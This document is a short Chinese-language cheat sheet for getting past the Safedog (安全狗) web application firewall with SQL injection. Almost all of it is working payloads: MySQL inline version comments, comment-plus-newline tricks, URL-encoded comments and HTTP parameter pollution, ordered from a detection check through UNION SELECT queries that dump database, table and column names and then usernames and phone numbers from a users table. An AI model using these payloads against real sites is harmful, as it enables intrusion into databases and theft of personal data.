安全狗Bypass
No.1 内联注释(/*![12345]*/)绕过方法:
/*!select*/: 相当于没有注释/*!12345select*/: 当12345小于当前mysql版本号的时候,注释不生效,当大于版本号的时候注释生效。/*![]*/: []中括号中的数字若填写则必须是5位
1,执行检测安全狗功能
http://test.com/test?id=1' or 1 and 1=1--+
拦截绕过方法:
http://test.com/test?id=1' or -1 and -1=-1--+
2,判断列数
http://test.com/test?id=1' or -1/*!11544order/*!11544by/*!11544*/1--+
3,联合查询绕过
http://test.com/test?id=1' or -1/*!11544union/*!11544select/*!115441,2,3,4,5,6*/--+
4,爆库
http://test.com/test?id=1' /*!11544union/*!11544select/*!115441,2,3,4,group_concat(schema_name),6*/from information_schema.schemata--+
5,表名
http://test.com/test?id=1' /*!11544union /*!11544select/*!115441,2,3,4,/*!11544group_concat(/*!11544table_name),6/*!11544from/*!11544information_schema.tables/*!11544where/*!11544table_schema=/*!11544database/*!11544()*/--+
6,列名
http://test.com/test?id=1' /*!11544union/*!11544select 1,2,3,4,
group_concat(column_name),6 from information_schema.columns where
table_schema in (database/*!11544()) and table_name in (0x7573657273)*/--+
7,获取内容
http://test.com/test?id=1' /*!11544union /*!11544select 1,2,3,4, group_concat(concat_ws(0x23,username,tel)),6 from users*/--+
内联注释
http://test.com/test?id=1' union/*!88888www.hacker.wang*/select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_schema=database () and /*!88888www.hacker.wang*/table_name=0x7573657273 --+mysql语法绕过
http://test.com/test?id=1' union -- www.hacker.wang%0aselect 1, 2,3,4, group_concat(column_name),6 from information_schema.columns where table_schema=database () and -- www.hacker.wang%0a table_name=0x7573657273--+
url编码绕过
http://test.com/test?id=1' union/*%!a*/select 1,2,3,4, group_concat(column_name),6 from information_schema.columns where table_schema=database () and table_name in (0x7573657273) --+HTTP参数污染绕过
http://test.com/test?id=1'/*&id=1'union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_schema=database() and table_name='users' --+*/